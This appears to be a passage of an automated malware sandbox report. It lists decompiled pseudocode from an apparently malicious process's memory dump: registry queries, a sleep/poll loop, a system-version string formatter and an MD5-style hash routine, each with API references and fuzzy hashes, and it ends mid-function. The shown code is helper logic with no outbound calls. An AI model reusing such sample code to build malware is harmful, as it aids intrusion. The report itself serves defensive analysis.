                                                                                  • Instruction ID: 8ab775528d54053dd75180823dcbd3c2da875591402a09858c8be186cbffa202
                                                                                  • Opcode Fuzzy Hash: 9b52ed4c010d64943d7341dbb9bfc7a919d88bb76c86dba9647a3e37cd689d3d
                                                                                  • Instruction Fuzzy Hash: 78B01231040101EFCA117B00DD48F05BB25F750704F504410B2400406C82314420FB08
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F81E9(void* __eax, void* __ecx, void* __edx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                  				int _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				char _v32;
                                                                                  				int _v40;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				intOrPtr _v68;
                                                                                  				char _v72;
                                                                                  				void* _t40;
                                                                                  				void* _t45;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				int _t59;
                                                                                  				void* _t60;
                                                                                  				void* _t62;
                                                                                  				void* _t63;
                                                                                  
                                                                                  				_t57 = __ecx;
                                                                                  				_t56 = _a4;
                                                                                  				_t59 = 0;
                                                                                  				_t60 = __eax;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_a4 = 0;
                                                                                  				if(__eax <= 0x40) {
                                                                                  					L20:
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				_t6 = _t60 - 0x40; // 0x33f3862
                                                                                  				_t40 = E033FA089(_a12, __ecx, __edx,  &_v72,  &_v16, _t56 + _t6);
                                                                                  				if(_t40 != 0) {
                                                                                  					goto L20;
                                                                                  				}
                                                                                  				_t61 = _t60 - 0x40;
                                                                                  				if(_v40 > _t60 - 0x40) {
                                                                                  					goto L20;
                                                                                  				}
                                                                                  				while( *((char*)(_t63 + _t40 - 0x34)) == 0) {
                                                                                  					_t40 = _t40 + 1;
                                                                                  					if(_t40 < 0x10) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					_t59 = _v40;
                                                                                  					_t54 = E033F75C4(_t59);
                                                                                  					_t71 = _t54;
                                                                                  					_a4 = _t54;
                                                                                  					if(_t54 != 0) {
                                                                                  						_t59 = 0;
                                                                                  						L17:
                                                                                  						if(_t59 != 0) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						L18:
                                                                                  						if(_a4 != 0) {
                                                                                  							E033F4C31(_a4);
                                                                                  						}
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					memcpy(_t54, _t56, _t59);
                                                                                  					L7:
                                                                                  					_t62 = _a4;
                                                                                  					E033F6D45(_t57, _t71, _t62, _t59,  &_v32);
                                                                                  					if(_v32 != _v72 || _v28 != _v68 || _v24 != _v64 || _v20 != _v60) {
                                                                                  						L14:
                                                                                  						_t59 = 0;
                                                                                  						goto L18;
                                                                                  					} else {
                                                                                  						 *_a8 = _t62;
                                                                                  						goto L17;
                                                                                  					}
                                                                                  				}
                                                                                  				_t45 = E033FA83A(_t61, _t56,  &_a4,  &_v12,  &_v56, 0); // executed
                                                                                  				__eflags = _t45;
                                                                                  				if(_t45 != 0) {
                                                                                  					_t59 = _v12;
                                                                                  					goto L17;
                                                                                  				}
                                                                                  				_t59 = _v40;
                                                                                  				__eflags = _v12 - _t59;
                                                                                  				if(__eflags >= 0) {
                                                                                  					goto L7;
                                                                                  				}
                                                                                  				goto L14;
                                                                                  			}
























                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000000,033F38A2,033F7BE6,033F7BE6,?,033F38A2,033F3862,033F38A2,?,033F38A2), ref: 033F8254
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3510742995-0
                                                                                  • Opcode ID: 0b4e236784037021541fb1e411d7099dd7a81a41d8dd6343a7fe4c299d759969
                                                                                  • Instruction ID: 87eaf685c5cc3d82ab9a089f2b9309713dfd75ec4c7043dbfbdf57dec6a715e2
                                                                                  • Opcode Fuzzy Hash: 0b4e236784037021541fb1e411d7099dd7a81a41d8dd6343a7fe4c299d759969
                                                                                  • Instruction Fuzzy Hash: 13312B76D01A08BFDF15DF99C9C0AEEBBBDAB44354F944061EA05EB210D630FA418BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4195(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                  				signed short _t18;
                                                                                  				void* _t24;
                                                                                  				signed int _t26;
                                                                                  				signed short _t27;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_t18 = E033F3160(_a4, _a8, _a12, __esi); // executed
                                                                                  					_t27 = _t18;
                                                                                  				} else {
                                                                                  					_t27 = E033F51C4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                  					if(_t27 == 0) {
                                                                                  						_t26 = _a8 >> 1;
                                                                                  						if(_t26 == 0) {
                                                                                  							_t27 = 2;
                                                                                  							HeapFree( *0x33fd1f0, 0, _a12);
                                                                                  						} else {
                                                                                  							_t24 = _a12;
                                                                                  							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                                                  							 *__esi = _t24;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t27;
                                                                                  			}








                                                                                  APIs
                                                                                    • Part of subcall function 033F51C4: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,033FA449,3D033FC0,80000002,033F544E,00000000,033F544E,?,65696C43,80000002), ref: 033F5206
                                                                                    • Part of subcall function 033F51C4: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,033FA449,3D033FC0,80000002,033F544E,00000000,033F544E,?,65696C43), ref: 033F522B
                                                                                    • Part of subcall function 033F51C4: RegCloseKey.ADVAPI32(80000002,?,033FA449,3D033FC0,80000002,033F544E,00000000,033F544E,?,65696C43,80000002,00000000,?), ref: 033F525B
                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,033F4C83,?,004F0053,05F29328,00000000,?), ref: 033F41E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: QueryValue$CloseFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2109406458-0
                                                                                  • Opcode ID: 1e6ef7879a8e37aed221d0e03ced1efe1fc383d223c36ce38817ebb0252bc933
                                                                                  • Instruction ID: 7c17c9c4806b26f18721788fe8fad0186103b55468cf57403d78b3febb30c8fc
                                                                                  • Opcode Fuzzy Hash: 1e6ef7879a8e37aed221d0e03ced1efe1fc383d223c36ce38817ebb0252bc933
                                                                                  • Instruction Fuzzy Hash: 1501FB36140249EFCF12EF46CC85FAB3B69FB94360F948429FB154A151D631D521DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 88%
                                                                                  			E033F13AD(intOrPtr* __edi) {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _t15;
                                                                                  				intOrPtr* _t21;
                                                                                  
                                                                                  				_t21 = __edi;
                                                                                  				_push( &_v12);
                                                                                  				_push(__edi);
                                                                                  				_v8 = 0x1d4c0;
                                                                                  				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                  				while(1) {
                                                                                  					_v16 = _t15;
                                                                                  					Sleep(0x1f4); // executed
                                                                                  					if(_v12 == 4) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v8 == 0) {
                                                                                  						L4:
                                                                                  						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						if(_v8 <= 0x1f4) {
                                                                                  							_v16 = 0x80004004;
                                                                                  						} else {
                                                                                  							_v8 = _v8 - 0x1f4;
                                                                                  							goto L4;
                                                                                  						}
                                                                                  					}
                                                                                  					L8:
                                                                                  					return _v16;
                                                                                  				}
                                                                                  				goto L8;
                                                                                  			}









                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 033F13F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 6769c51f30f680e01349a6c9094da1955c32dfb925b91c229bfa897903448a4d
                                                                                  • Instruction ID: 40acb8979b20941716908b32814cb26c7da163ac4d271fe79d63573a42550a83
                                                                                  • Opcode Fuzzy Hash: 6769c51f30f680e01349a6c9094da1955c32dfb925b91c229bfa897903448a4d
                                                                                  • Instruction Fuzzy Hash: 41F03771C01218EFCB04DBD9E888AEDB7B8FF04304F5480ABE602A3200D3B46B84CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(033F544E,?,?,033FA536,3D033FC0,80000002,033F544E,033F5886,74666F53,4D4C4B48,033F5886,?,3D033FC0,80000002,033F544E,?), ref: 033F4013
                                                                                    • Part of subcall function 033F9F53: SysAllocString.OLEAUT32(033F5886), ref: 033F9F6D
                                                                                    • Part of subcall function 033F9F53: SysFreeString.OLEAUT32(00000000), ref: 033F9FAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3808004451-0
                                                                                  • Opcode ID: 3d8f94fd22f4b606e251f65702cd95fb90b349fdd4c79bc7e7b72c32fe5b993d
                                                                                  • Instruction ID: 860662981974057f0139214e787e423829090c0dac72e105accdec0af6a3f60d
                                                                                  • Opcode Fuzzy Hash: 3d8f94fd22f4b606e251f65702cd95fb90b349fdd4c79bc7e7b72c32fe5b993d
                                                                                  • Instruction Fuzzy Hash: C0E0C23600020EFFDF129F80EC85EAA7F6AFB08350F448015FA1818061D772D6B0ABA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F74F4(void* __edx, void* __edi, void* _a4) {
                                                                                  				int _t7;
                                                                                  				int _t13;
                                                                                  
                                                                                  				_t7 = E033F7B54(__edx, __edi, _a4,  &_a4); // executed
                                                                                  				_t13 = _t7;
                                                                                  				if(_t13 != 0) {
                                                                                  					memcpy(__edi, _a4, _t13);
                                                                                  					 *((char*)(__edi + _t13)) = 0;
                                                                                  					E033F4C31(_a4);
                                                                                  				}
                                                                                  				return _t13;
                                                                                  			}






                                                                                  APIs
                                                                                    • Part of subcall function 033F7B54: memcpy.NTDLL(00000000,00000090,033F38A2,033F38A2,?,?,033F38A2,?,?,033F819E,?), ref: 033F7B8A
                                                                                    • Part of subcall function 033F7B54: memset.NTDLL ref: 033F7BFF
                                                                                    • Part of subcall function 033F7B54: memset.NTDLL ref: 033F7C13
                                                                                  • memcpy.NTDLL(033F38A2,033F38A2,00000000,033F38A2,033F38A2,033F38A2,?,?,033F819E,?,?,033F38A2,?), ref: 033F7510
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memcpymemset$FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3053036209-0
                                                                                  • Opcode ID: b513ea67cf98115dce7cee0d64ca3f08bf932c0a0fb250f4e76961dc4aa8a12c
                                                                                  • Instruction ID: e7a0aaa16c604be56900b3aae1077ec16ffe565f582bf03e8e24c73cf40e8d6d
                                                                                  • Opcode Fuzzy Hash: b513ea67cf98115dce7cee0d64ca3f08bf932c0a0fb250f4e76961dc4aa8a12c
                                                                                  • Instruction Fuzzy Hash: 86E086368012187ECB12AA94DC80DFF7F5CCF466D0F444020FF084A200D631DA1093E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  C-Code - Quality: 93%
                                                                                  			E033FA667() {
                                                                                  				signed char _t21;
                                                                                  				signed char _t23;
                                                                                  				intOrPtr _t29;
                                                                                  				signed int _t32;
                                                                                  				CHAR* _t35;
                                                                                  				void* _t37;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t37 = _t39 - 0x78;
                                                                                  				_t35 = 0;
                                                                                  				 *(_t37 - 0x24) = 0x9c;
                                                                                  				if(GetVersionExA(_t37 - 0x24) != 0) {
                                                                                  					_t35 = E033F75C4(0x42);
                                                                                  					if(_t35 != 0) {
                                                                                  						_t21 =  *0x33fd214; // 0x4000000a
                                                                                  						_t32 = _t21 & 0x000000ff;
                                                                                  						if( *(_t37 - 0x20) != _t32 ||  *(_t37 - 0x1c) != (_t21 & 0x000000ff)) {
                                                                                  							 *(_t37 + 0x70) =  *(_t37 + 0x70) & 0x00000000;
                                                                                  							 *(_t37 - 0x18) =  *(_t37 - 0x18) & 0x00000000;
                                                                                  							 *(_t37 - 0x20) = _t32;
                                                                                  							 *(_t37 - 0x1c) = _t21 & 0x000000ff;
                                                                                  						}
                                                                                  						_t23 =  *0x33fd218; // 0x1
                                                                                  						asm("sbb eax, eax");
                                                                                  						_t29 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t16 = _t29 + 0x33fe8f1; // 0x252e7525
                                                                                  						wsprintfA(_t35, _t16,  *(_t37 - 0x20),  *(_t37 - 0x1c),  *(_t37 + 0x70) & 0x0000ffff,  *(_t37 - 0x18), ( ~(_t23 & 0x00000001) & 0xffffffea) + 0x56);
                                                                                  					}
                                                                                  				}
                                                                                  				return _t35;
                                                                                  			}











                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(?,00000000), ref: 033FA680
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • wsprintfA.USER32 ref: 033FA6EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AllocateHeapVersionwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3641471311-0
                                                                                  • Opcode ID: 5c99ec5756c75d1fc18ce89b70e03d1d55efd60286b77bcba361a1285769d80c
                                                                                  • Instruction ID: ac28616a6a1d26de1c4496c5943582a1fafa2b9f72dcd4f3048371adeacd4dca
                                                                                  • Opcode Fuzzy Hash: 5c99ec5756c75d1fc18ce89b70e03d1d55efd60286b77bcba361a1285769d80c
                                                                                  • Instruction Fuzzy Hash: 441130B2D0022A9FDF10EFA4DC89ABDB7F8FB04305F444559F914E6145E339C5458BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 50%
                                                                                  			E033F28E9(void* __ecx, intOrPtr* _a4) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				intOrPtr _v48;
                                                                                  				intOrPtr _v52;
                                                                                  				intOrPtr _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				intOrPtr _v68;
                                                                                  				intOrPtr _v72;
                                                                                  				void _v76;
                                                                                  				intOrPtr* _t226;
                                                                                  				signed int _t229;
                                                                                  				signed int _t231;
                                                                                  				signed int _t233;
                                                                                  				signed int _t235;
                                                                                  				signed int _t237;
                                                                                  				signed int _t239;
                                                                                  				signed int _t241;
                                                                                  				signed int _t243;
                                                                                  				signed int _t245;
                                                                                  				signed int _t247;
                                                                                  				signed int _t249;
                                                                                  				signed int _t251;
                                                                                  				signed int _t253;
                                                                                  				signed int _t255;
                                                                                  				signed int _t257;
                                                                                  				signed int _t259;
                                                                                  				signed int _t274;
                                                                                  				signed int _t337;
                                                                                  				void* _t347;
                                                                                  				signed int _t348;
                                                                                  				signed int _t350;
                                                                                  				signed int _t352;
                                                                                  				signed int _t354;
                                                                                  				signed int _t356;
                                                                                  				signed int _t358;
                                                                                  				signed int _t360;
                                                                                  				signed int _t362;
                                                                                  				signed int _t364;
                                                                                  				signed int _t366;
                                                                                  				signed int _t375;
                                                                                  				signed int _t377;
                                                                                  				signed int _t379;
                                                                                  				signed int _t381;
                                                                                  				signed int _t383;
                                                                                  				intOrPtr* _t399;
                                                                                  				signed int _t407;
                                                                                  				signed int _t409;
                                                                                  				signed int _t411;
                                                                                  				signed int _t413;
                                                                                  				signed int _t415;
                                                                                  				signed int _t417;
                                                                                  				signed int _t419;
                                                                                  				signed int _t421;
                                                                                  				signed int _t423;
                                                                                  				signed int _t425;
                                                                                  				signed int _t427;
                                                                                  				signed int _t429;
                                                                                  				signed int _t437;
                                                                                  				signed int _t439;
                                                                                  				signed int _t441;
                                                                                  				signed int _t443;
                                                                                  				signed int _t445;
                                                                                  				void* _t447;
                                                                                  				signed int _t507;
                                                                                  				signed int _t598;
                                                                                  				signed int _t606;
                                                                                  				signed int _t612;
                                                                                  				signed int _t678;
                                                                                  				signed int* _t681;
                                                                                  				signed int _t682;
                                                                                  				signed int _t684;
                                                                                  				signed int _t689;
                                                                                  				signed int _t691;
                                                                                  				signed int _t696;
                                                                                  				signed int _t698;
                                                                                  				signed int _t717;
                                                                                  				signed int _t719;
                                                                                  				signed int _t721;
                                                                                  				signed int _t723;
                                                                                  				signed int _t725;
                                                                                  				signed int _t727;
                                                                                  				signed int _t733;
                                                                                  				signed int _t739;
                                                                                  				signed int _t741;
                                                                                  				signed int _t743;
                                                                                  				signed int _t745;
                                                                                  				signed int _t747;
                                                                                  
                                                                                  				_t226 = _a4;
                                                                                  				_t347 = __ecx + 2;
                                                                                  				_t681 =  &_v76;
                                                                                  				_t447 = 0x10;
                                                                                  				do {
                                                                                  					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                                                  					_t347 = _t347 + 4;
                                                                                  					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                                                  					_t681 =  &(_t681[1]);
                                                                                  					_t447 = _t447 - 1;
                                                                                  				} while (_t447 != 0);
                                                                                  				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                  				_t682 =  *_t6;
                                                                                  				_t7 = _t226 + 8; // 0x8d08458b
                                                                                  				_t407 =  *_t7;
                                                                                  				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                  				_t348 =  *_t8;
                                                                                  				asm("rol eax, 0x7");
                                                                                  				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                                                  				asm("rol ecx, 0xc");
                                                                                  				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                                                  				asm("ror edx, 0xf");
                                                                                  				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                                                                  				asm("ror esi, 0xa");
                                                                                  				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                                                  				_v8 = _t684;
                                                                                  				_t689 = _v8;
                                                                                  				asm("rol eax, 0x7");
                                                                                  				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                                                  				asm("rol ecx, 0xc");
                                                                                  				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                                                  				asm("ror edx, 0xf");
                                                                                  				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                                                  				asm("ror esi, 0xa");
                                                                                  				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                                                  				_v8 = _t691;
                                                                                  				_t696 = _v8;
                                                                                  				asm("rol eax, 0x7");
                                                                                  				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                                                  				asm("rol ecx, 0xc");
                                                                                  				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                                                  				asm("ror edx, 0xf");
                                                                                  				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                                                  				asm("ror esi, 0xa");
                                                                                  				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                                                  				_v8 = _t698;
                                                                                  				asm("rol eax, 0x7");
                                                                                  				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                  				asm("rol ecx, 0xc");
                                                                                  				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                                                  				_t507 =  !_t356;
                                                                                  				asm("ror edx, 0xf");
                                                                                  				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                                                  				_v12 = _t415;
                                                                                  				_v12 =  !_v12;
                                                                                  				asm("ror esi, 0xa");
                                                                                  				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                                                  				asm("rol eax, 0x5");
                                                                                  				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                                                  				asm("rol ecx, 0x9");
                                                                                  				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                                                  				asm("rol edx, 0xe");
                                                                                  				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                                                  				asm("ror esi, 0xc");
                                                                                  				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                                                  				asm("rol eax, 0x5");
                                                                                  				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                                                  				asm("rol ecx, 0x9");
                                                                                  				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                                                  				asm("rol edx, 0xe");
                                                                                  				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                                                  				asm("ror esi, 0xc");
                                                                                  				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                                                  				asm("rol eax, 0x5");
                                                                                  				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                                                  				asm("rol ecx, 0x9");
                                                                                  				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                                                  				asm("rol edx, 0xe");
                                                                                  				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                                                  				asm("ror esi, 0xc");
                                                                                  				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                                                  				asm("rol eax, 0x5");
                                                                                  				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                                                  				asm("rol ecx, 0x9");
                                                                                  				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                                                  				asm("rol edx, 0xe");
                                                                                  				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                                                  				asm("ror esi, 0xc");
                                                                                  				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                                                  				asm("rol eax, 0x4");
                                                                                  				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                                                  				asm("rol ecx, 0xb");
                                                                                  				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                                                  				asm("rol edx, 0x10");
                                                                                  				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                                                  				_t598 = _t366 ^ _t425;
                                                                                  				asm("ror esi, 0x9");
                                                                                  				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                                                  				asm("rol eax, 0x4");
                                                                                  				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                                                  				asm("rol edi, 0xb");
                                                                                  				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                                                  				asm("rol edx, 0x10");
                                                                                  				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                                                  				_t337 = _t606 ^ _t427;
                                                                                  				asm("ror ecx, 0x9");
                                                                                  				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                                                  				asm("rol eax, 0x4");
                                                                                  				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                                                  				asm("rol esi, 0xb");
                                                                                  				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                                                  				asm("rol edi, 0x10");
                                                                                  				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                                                  				_t429 = _t733 ^ _t612;
                                                                                  				asm("ror ecx, 0x9");
                                                                                  				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                                                  				asm("rol eax, 0x4");
                                                                                  				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                                                  				asm("rol edx, 0xb");
                                                                                  				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                                                  				asm("rol esi, 0x10");
                                                                                  				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                                                  				asm("ror ecx, 0x9");
                                                                                  				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                                                  				asm("rol eax, 0x6");
                                                                                  				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                                                  				asm("rol edx, 0xa");
